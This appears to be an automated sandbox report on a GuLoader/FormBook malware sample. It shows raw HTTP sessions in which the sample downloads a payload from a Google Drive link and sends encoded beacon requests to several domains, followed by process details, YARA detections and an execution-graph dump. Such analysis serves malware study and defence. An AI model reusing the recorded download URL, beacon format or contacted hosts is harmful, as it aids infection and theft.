                                        Jun 4, 2024 14:41:42.881182909 CEST | 107 | IN | HTTP/1.1 436
                                        date: Tue, 04 Jun 2024 12:41:42 GMT
                                        content-length: 0
                                        server: NginX
                                        connection: close


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        97 | 192.168.11.30 | 49895 | 23.227.38.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:41:48.028067112 CEST | 471 | OUT | GET /a8pp/?2NlhHLS8=ZqgRA3RjVMUu2H0TaDCH0HK+MdKctN1/aoqoBTGPFOshE07y8/o+O03dRLUBk0uLAhE/8MrMAhZXWBIBuwTev6HTmbTiouybFpqBqX/1lMiuZO8RTLeMtxw=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.shootprecious.com
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:41:48.203505993 CEST | 1289 | IN | HTTP/1.1 301 Moved Permanently
                                        Date: Tue, 04 Jun 2024 12:41:48 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        X-Sorting-Hat-PodId: 169
                                        X-Sorting-Hat-ShopId: 29847355437
                                        X-Storefront-Renderer-Rendered: 1
                                        location: https://www.shootprecious.com/a8pp?2NlhHLS8=ZqgRA3RjVMUu2H0TaDCH0HK+MdKctN1/aoqoBTGPFOshE07y8/o+O03dRLUBk0uLAhE/8MrMAhZXWBIBuwTev6HTmbTiouybFpqBqX/1lMiuZO8RTLeMtxw=&0z=jXZhddsppL
                                        x-redirect-reason: https_required
                                        x-frame-options: DENY
                                        content-security-policy: frame-ancestors 'none';
                                        x-shopid: 29847355437
                                        x-shardid: 169
                                        vary: Accept
                                        powered-by: Shopify
                                        server-timing: processing;dur=9, db;dur=2, asn;desc="60068", edge;desc="MIA", country;desc="US", pageType;desc="404", servedBy;desc="54zl", requestID;desc="488ad7e1-26c1-4e21-b26e-694e771e0987-1717504908"
                                        x-dc: gcp-us-east1,gcp-us-east1,gcp-us-east1
                                        x-request-id: 488ad7e1-26c1-4e21-b26e-694e771e0987-1717504908
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BJpIQ0wlQLWiKcb4aphOlkp%2FmV5mMVLWavlvbOXLgllgfIumGNk1LkgS4OvIwnpGPgdfx3NDD8Wf0ypm7GMEsiwhxfuZTLWJ3laI41oT0rBipAppe5jlPxk4z%2BwRHLMgt9k%2FJv%2FfgQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","m
                                        Data Raw:
                                        Data Ascii:
                                        Jun 4, 2024 14:41:48.203603029 CEST | 281 | IN
                                        Data Ascii: x_age":604800}Server-Timing: cfRequestDuration;dur=44.000149X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-Download-Options: noopenServer: cloudflareCF-RAY: 88e7ffcb9c88b3c8
                                        Jun 4, 2024 14:41:48.203670979 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        98 | 192.168.11.30 | 49897 | 217.70.184.50 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:41:53.435539007 CEST | 476 | OUT | GET /a8pp/?2NlhHLS8=eq13gBt76ePDaE9jPC0A9Iupd/gjzDBrOAbtoaeLD+8wGtFf895L9qocKFTqmVpd7xt5UEIOF7l9ga++P+8IeJMZhOURtvON+WXuvIh3J+ggFIDS+M1ogAg=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.cyberpsychsecurity.com
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:41:53.649365902 CEST | 1289 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:41:53 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        Vary: Accept-Language
                                        Data Ascii: 7bb<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>cyberpsychsecurity.com</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="h [TRUNCATED]
                                        Jun 4, 2024 14:41:53.649462938 CEST | 886 | IN
                                        Data Ascii: results of cyberpsychsecurity.com</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Parking_2023-outerbox_2j18t"><p class="Parking_2023-borderbox_1Gwb_"><span c
                                        Jun 4, 2024 14:41:53.649477005 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        0 | 192.168.11.30 | 49792 | 142.250.217.174 | 443 | 3220 | C:\Users\user\Desktop\ulACwpUCSU.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2024-06-04 12:34:03 UTC | 216 | OUT | GET /uc?export=download&id=17gm-wgqB94fKwcr7ZsHzQiLhRxM6222H HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                        Host: drive.google.com
                                        Cache-Control: no-cache
                                        2024-06-04 12:34:03 UTC | 1582 | IN | HTTP/1.1 303 See Other
                                        Content-Type: application/binary
                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                        Pragma: no-cache
                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                        Date: Tue, 04 Jun 2024 12:34:03 GMT
                                        Location: https://drive.usercontent.google.com/download?id=17gm-wgqB94fKwcr7ZsHzQiLhRxM6222H&export=download
                                        Strict-Transport-Security: max-age=31536000
                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                        Content-Security-Policy: script-src 'nonce-5duTGzOW9NDymuTjILo9bQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                        Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                        Cross-Origin-Opener-Policy: same-origin
                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                        Server: ESF
                                        Content-Length: 0
                                        X-XSS-Protection: 0
                                        X-Frame-Options: SAMEORIGIN
                                        X-Content-Type-Options: nosniff
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                        Connection: close


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        1 | 192.168.11.30 | 49793 | 142.250.217.193 | 443 | 3220 | C:\Users\user\Desktop\ulACwpUCSU.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2024-06-04 12:34:04 UTC | 258 | OUT | GET /download?id=17gm-wgqB94fKwcr7ZsHzQiLhRxM6222H&export=download HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                        Cache-Control: no-cache
                                        Host: drive.usercontent.google.com
                                        Connection: Keep-Alive
                                        2024-06-04 12:34:04 UTC | 4810 | IN | HTTP/1.1 200 OK
                                        Content-Type: application/octet-stream
                                        Content-Security-Policy: sandbox
                                        Content-Security-Policy: default-src 'none'
                                        Content-Security-Policy: frame-ancestors 'none'
                                        X-Content-Security-Policy: sandbox
                                        Cross-Origin-Opener-Policy: same-origin
                                        Cross-Origin-Embedder-Policy: require-corp
                                        Cross-Origin-Resource-Policy: same-site
                                        X-Content-Type-Options: nosniff
                                        Content-Disposition: attachment; filename="uNvfoz108.bin"
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Allow-Credentials: false
                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Dom [TRUNCATED]
                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                        Accept-Ranges: bytes
                                        Content-Length: 271424
                                        Last-Modified: Mon, 27 May 2024 09:10:30 GMT
                                        X-GUploader-UploadID: ABPtcPqcq5qbJUHMkq3NSE8IevW-0OPofqh1_PepqbvGJcR0jIustGrNaNo05mu0FvFlUAwDcIkAsz979g
                                        Date: Tue, 04 Jun 2024 12:34:04 GMT
                                        Expires: Tue, 04 Jun 2024 12:34:04 GMT
                                        Cache-Control: private, max-age=0
                                        X-Goog-Hash: crc32c=MNJtSA==
                                        Server: UploadServer
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                        Connection: close



                                        Target ID:0
                                        Start time:08:33:04
                                        Start date:04/06/2024
                                        Path:C:\Users\user\Desktop\ulACwpUCSU.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\ulACwpUCSU.exe"
                                        Imagebase:0x400000
                                        File size:627'775 bytes
                                        MD5 hash:B6F8B1C89399490857FACFCF5BB78D86
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2885919945.0000000005AF5000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:true

                                        Target ID:3
                                        Start time:08:33:46
                                        Start date:04/06/2024
                                        Path:C:\Users\user\Desktop\ulACwpUCSU.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\ulACwpUCSU.exe"
                                        Imagebase:0x400000
                                        File size:627'775 bytes
                                        MD5 hash:B6F8B1C89399490857FACFCF5BB78D86
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3044504432.00000000373A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3044504432.00000000373A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        Reputation:low
                                        Has exited:true

                                        Target ID:4
                                        Start time:08:34:09
                                        Start date:04/06/2024
                                        Path:C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe"
                                        Imagebase:0xec0000
                                        File size:140'800 bytes
                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.7373346387.00000000037A0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.7373346387.00000000037A0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                        Reputation:high
                                        Has exited:false

                                        Target ID:5
                                        Start time:08:34:11
                                        Start date:04/06/2024
                                        Path:C:\Windows\SysWOW64\runonce.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\SysWOW64\runonce.exe"
                                        Imagebase:0x140000
                                        File size:47'104 bytes
                                        MD5 hash:7430CCC7226A6FF76B6D55B96F6CE53C
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.7373754764.0000000004F20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.7373754764.0000000004F20000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.7373930298.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.7373930298.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        Reputation:low
                                        Has exited:false

                                        Target ID:6
                                        Start time:08:34:24
                                        Start date:04/06/2024
                                        Path:C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe"
                                        Imagebase:0xec0000
                                        File size:140'800 bytes
                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.7372491804.0000000001410000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.7372491804.0000000001410000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        Reputation:high
                                        Has exited:false

                                        Target ID:7
                                        Start time:08:34:35
                                        Start date:04/06/2024
                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                        Imagebase:0x7ff7f7070000
                                        File size:687'008 bytes
                                        MD5 hash:D1CC73370B9EF7D74E6D9FD9248CD687
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true


                                          Execution Graph

                                          Execution Coverage:20.9%
                                          Dynamic/Decrypted Code Coverage:14.3%
                                          Signature Coverage:19.7%
                                          Total number of Nodes:1474
                                          Total number of Limit Nodes:43
4021bc lstrlenA lstrlenA 4160 40501f 25 API calls 4158->4160 4159 40501f 25 API calls 4163 4021b7 4159->4163 4161 4021f8 SHFileOperationA 4160->4161 4162 4021af 4161->4162 4161->4163 4162->4159 4162->4163 4165 406050 FindClose 4164->4165 4166 4021ab 4164->4166 4165->4166 4166->4158 4166->4162 5214 40280a 5215 4029e0 18 API calls 5214->5215 5216 402810 5215->5216 5217 402841 5216->5217 5218 402663 5216->5218 5220 40281e 5216->5220 5217->5218 5219 405d58 18 API calls 5217->5219 5219->5218 5220->5218 5222 405c94 wsprintfA 5220->5222 5222->5218 5223 40220c 5224 402213 5223->5224 5228 402226 5223->5228 5225 405d58 18 API calls 5224->5225 5226 402220 5225->5226 5227 40554a MessageBoxIndirectA 5226->5227 5227->5228 5229 401490 5230 40501f 25 API calls 5229->5230 5231 401497 5230->5231 5232 406310 5234 406194 5232->5234 5233 406aff 5234->5233 5235 406215 GlobalFree 5234->5235 5236 40621e GlobalAlloc 5234->5236 5237 406295 GlobalAlloc 5234->5237 5238 40628c GlobalFree 5234->5238 5235->5236 5236->5233 5236->5234 5237->5233 5237->5234 5238->5237 4191 401b11 4192 401b62 4191->4192 4193 401b1e 4191->4193 4194 401b66 4192->4194 4195 401b8b GlobalAlloc 4192->4195 4196 401ba6 4193->4196 4201 401b35 4193->4201 4204 402226 4194->4204 4212 405d36 lstrcpynA 4194->4212 4197 405d58 18 API calls 4195->4197 4198 405d58 18 API calls 4196->4198 4196->4204 4197->4196 4200 402220 4198->4200 4213 40554a 4200->4213 4210 405d36 lstrcpynA 4201->4210 4203 401b78 GlobalFree 4203->4204 4206 401b44 4211 405d36 lstrcpynA 4206->4211 4208 401b53 4217 405d36 lstrcpynA 4208->4217 4210->4206 4211->4208 4212->4203 4216 40555f 4213->4216 4214 4055ab 4214->4204 4215 405573 MessageBoxIndirectA 4215->4214 4216->4214 4216->4215 4217->4204 5239 404f93 5240 404fa3 5239->5240 5241 404fb7 5239->5241 5242 404fa9 5240->5242 5251 405000 5240->5251 5243 404fbf IsWindowVisible 5241->5243 5247 404fd6 5241->5247 5245 404038 SendMessageA 5242->5245 5246 404fcc 5243->5246 5243->5251 5244 405005 CallWindowProcA 5248 404fb3 
5244->5248 5245->5248 5252 4048ea SendMessageA 5246->5252 5247->5244 5257 40496a 5247->5257 5251->5244 5253 404949 SendMessageA 5252->5253 5254 40490d GetMessagePos ScreenToClient SendMessageA 5252->5254 5255 404941 5253->5255 5254->5255 5256 404946 5254->5256 5255->5247 5256->5253 5266 405d36 lstrcpynA 5257->5266 5259 40497d 5267 405c94 wsprintfA 5259->5267 5261 404987 5262 40140b 2 API calls 5261->5262 5263 404990 5262->5263 5268 405d36 lstrcpynA 5263->5268 5265 404997 5265->5251 5266->5259 5267->5261 5268->5265 5269 401c95 5270 4029e0 18 API calls 5269->5270 5271 401c9c 5270->5271 5272 4029e0 18 API calls 5271->5272 5273 401ca4 GetDlgItem 5272->5273 5274 4024cb 5273->5274 5275 401595 5276 4029fd 18 API calls 5275->5276 5277 40159c SetFileAttributesA 5276->5277 5278 4015ae 5277->5278 4266 403217 #17 SetErrorMode OleInitialize 4267 406061 3 API calls 4266->4267 4268 40325c SHGetFileInfoA 4267->4268 4341 405d36 lstrcpynA 4268->4341 4270 403287 GetCommandLineA 4342 405d36 lstrcpynA 4270->4342 4272 403299 GetModuleHandleA 4273 4032b0 4272->4273 4274 4057f1 CharNextA 4273->4274 4275 4032c4 CharNextA 4274->4275 4281 4032d4 4275->4281 4276 40339e 4277 4033b1 GetTempPathA 4276->4277 4343 4031e3 4277->4343 4279 4033c9 4282 403423 DeleteFileA 4279->4282 4283 4033cd GetWindowsDirectoryA lstrcatA 4279->4283 4280 4057f1 CharNextA 4280->4281 4281->4276 4281->4280 4286 4033a0 4281->4286 4351 402c79 GetTickCount GetModuleFileNameA 4282->4351 4285 4031e3 11 API calls 4283->4285 4288 4033e9 4285->4288 4435 405d36 lstrcpynA 4286->4435 4287 403437 4295 4057f1 CharNextA 4287->4295 4324 4034bd 4287->4324 4335 4034cd 4287->4335 4288->4282 4290 4033ed GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4288->4290 4291 4031e3 11 API calls 4290->4291 4293 40341b 4291->4293 4293->4282 4293->4335 4297 403452 4295->4297 4304 403498 4297->4304 4305 4034fc lstrcatA lstrcmpiA 4297->4305 4298 4034e6 4301 40554a MessageBoxIndirectA 4298->4301 4299 4035da 4300 40367d ExitProcess 
4299->4300 4303 406061 3 API calls 4299->4303 4306 4034f4 ExitProcess 4301->4306 4307 4035ed 4303->4307 4436 4058b4 4304->4436 4309 403518 CreateDirectoryA SetCurrentDirectoryA 4305->4309 4305->4335 4312 406061 3 API calls 4307->4312 4310 40353a 4309->4310 4311 40352f 4309->4311 4462 405d36 lstrcpynA 4310->4462 4461 405d36 lstrcpynA 4311->4461 4316 4035f6 4312->4316 4318 406061 3 API calls 4316->4318 4320 4035ff 4318->4320 4319 4034b2 4451 405d36 lstrcpynA 4319->4451 4323 40361d 4320->4323 4329 40360d GetCurrentProcess 4320->4329 4322 405d58 18 API calls 4325 403579 DeleteFileA 4322->4325 4326 406061 3 API calls 4323->4326 4381 403787 4324->4381 4327 403586 CopyFileA 4325->4327 4338 403548 4325->4338 4328 403654 4326->4328 4327->4338 4331 403669 ExitWindowsEx 4328->4331 4334 403676 4328->4334 4329->4323 4330 4035ce 4332 405bea 40 API calls 4330->4332 4331->4300 4331->4334 4332->4335 4471 40140b 4334->4471 4452 403695 4335->4452 4337 405d58 18 API calls 4337->4338 4338->4322 4338->4330 4338->4337 4340 4035ba CloseHandle 4338->4340 4463 405bea 4338->4463 4468 4054e5 CreateProcessA 4338->4468 4340->4338 4341->4270 4342->4272 4344 405fa1 5 API calls 4343->4344 4346 4031ef 4344->4346 4345 4031f9 4345->4279 4346->4345 4474 4057c6 lstrlenA CharPrevA 4346->4474 4349 4059f6 2 API calls 4350 403215 4349->4350 4350->4279 4477 4059c7 GetFileAttributesA CreateFileA 4351->4477 4353 402cbc 4380 402cc9 4353->4380 4478 405d36 lstrcpynA 4353->4478 4355 402cdf 4479 40580d lstrlenA 4355->4479 4359 402cf0 GetFileSize 4360 402df1 4359->4360 4362 402d07 4359->4362 4484 402bda 4360->4484 4362->4360 4366 402e8c 4362->4366 4373 402bda 33 API calls 4362->4373 4362->4380 4515 4031b6 4362->4515 4365 402e34 GlobalAlloc 4370 402e4b 4365->4370 4367 402bda 33 API calls 4366->4367 4367->4380 4369 402e15 4372 4031b6 ReadFile 4369->4372 4371 4059f6 2 API calls 4370->4371 4374 402e5c CreateFileA 4371->4374 4375 402e20 4372->4375 4373->4362 4376 402e96 4374->4376 4374->4380 4375->4365 4375->4380 4499 
4031cc SetFilePointer 4376->4499 4378 402ea4 4500 402f1f 4378->4500 4380->4287 4382 406061 3 API calls 4381->4382 4383 40379b 4382->4383 4384 4037a1 4383->4384 4385 4037b3 4383->4385 4565 405c94 wsprintfA 4384->4565 4386 405c1d 3 API calls 4385->4386 4387 4037de 4386->4387 4388 4037fc lstrcatA 4387->4388 4390 405c1d 3 API calls 4387->4390 4391 4037b1 4388->4391 4390->4388 4549 403a4c 4391->4549 4394 4058b4 18 API calls 4395 40382e 4394->4395 4396 4038b7 4395->4396 4398 405c1d 3 API calls 4395->4398 4397 4058b4 18 API calls 4396->4397 4399 4038bd 4397->4399 4400 40385a 4398->4400 4401 4038cd LoadImageA 4399->4401 4402 405d58 18 API calls 4399->4402 4400->4396 4408 403876 lstrlenA 4400->4408 4409 4057f1 CharNextA 4400->4409 4403 403973 4401->4403 4404 4038f4 RegisterClassA 4401->4404 4402->4401 4407 40140b 2 API calls 4403->4407 4405 40397d 4404->4405 4406 40392a SystemParametersInfoA CreateWindowExA 4404->4406 4405->4335 4406->4403 4412 403979 4407->4412 4410 403884 lstrcmpiA 4408->4410 4411 4038aa 4408->4411 4413 403874 4409->4413 4410->4411 4414 403894 GetFileAttributesA 4410->4414 4415 4057c6 3 API calls 4411->4415 4412->4405 4417 403a4c 19 API calls 4412->4417 4413->4408 4416 4038a0 4414->4416 4418 4038b0 4415->4418 4416->4411 4419 40580d 2 API calls 4416->4419 4420 40398a 4417->4420 4566 405d36 lstrcpynA 4418->4566 4419->4411 4422 403996 ShowWindow LoadLibraryA 4420->4422 4423 403a19 4420->4423 4425 4039b5 LoadLibraryA 4422->4425 4426 4039bc GetClassInfoA 4422->4426 4558 4050f1 OleInitialize 4423->4558 4425->4426 4428 4039d0 GetClassInfoA RegisterClassA 4426->4428 4429 4039e6 DialogBoxParamA 4426->4429 4427 403a1f 4431 403a23 4427->4431 4432 403a3b 4427->4432 4428->4429 4430 40140b 2 API calls 4429->4430 4430->4405 4431->4405 4434 40140b 2 API calls 4431->4434 4433 40140b 2 API calls 4432->4433 4433->4405 4434->4405 4435->4277 4575 405d36 lstrcpynA 4436->4575 4438 4058c5 4439 40585f 4 API calls 4438->4439 4440 4058cb 4439->4440 4441 4034a3 4440->4441 4442 
405fa1 5 API calls 4440->4442 4441->4335 4450 405d36 lstrcpynA 4441->4450 4448 4058db 4442->4448 4443 405906 lstrlenA 4444 405911 4443->4444 4443->4448 4446 4057c6 3 API calls 4444->4446 4445 40603a 2 API calls 4445->4448 4447 405916 GetFileAttributesA 4446->4447 4447->4441 4448->4441 4448->4443 4448->4445 4449 40580d 2 API calls 4448->4449 4449->4443 4450->4319 4451->4324 4453 4036b0 4452->4453 4454 4036a6 CloseHandle 4452->4454 4455 4036c4 4453->4455 4456 4036ba CloseHandle 4453->4456 4454->4453 4576 4036f2 4455->4576 4456->4455 4461->4310 4462->4338 4464 406061 3 API calls 4463->4464 4465 405bf1 4464->4465 4467 405c12 4465->4467 4633 405a6e lstrcpyA 4465->4633 4467->4338 4469 405524 4468->4469 4470 405518 CloseHandle 4468->4470 4469->4338 4470->4469 4472 401389 2 API calls 4471->4472 4473 401420 4472->4473 4473->4300 4475 4057e0 lstrcatA 4474->4475 4476 403201 CreateDirectoryA 4474->4476 4475->4476 4476->4349 4477->4353 4478->4355 4480 40581a 4479->4480 4481 402ce5 4480->4481 4482 40581f CharPrevA 4480->4482 4483 405d36 lstrcpynA 4481->4483 4482->4480 4482->4481 4483->4359 4485 402c00 4484->4485 4486 402be8 4484->4486 4488 402c10 GetTickCount 4485->4488 4489 402c08 4485->4489 4487 402bf1 DestroyWindow 4486->4487 4494 402bf8 4486->4494 4487->4494 4491 402c1e 4488->4491 4488->4494 4519 40609a 4489->4519 4492 402c53 CreateDialogParamA ShowWindow 4491->4492 4493 402c26 4491->4493 4492->4494 4493->4494 4523 402bbe 4493->4523 4494->4365 4494->4380 4518 4031cc SetFilePointer 4494->4518 4496 402c34 wsprintfA 4497 40501f 25 API calls 4496->4497 4498 402c51 4497->4498 4498->4494 4499->4378 4501 402f4b 4500->4501 4502 402f2f SetFilePointer 4500->4502 4526 40303a GetTickCount 4501->4526 4502->4501 4507 40303a 43 API calls 4508 402f82 4507->4508 4509 402ffc ReadFile 4508->4509 4511 402ff6 4508->4511 4514 402f92 4508->4514 4509->4511 4511->4380 4512 405a3f ReadFile 4512->4514 4513 402fc5 WriteFile 4513->4511 4513->4514 4514->4511 4514->4512 4514->4513 4516 405a3f ReadFile 
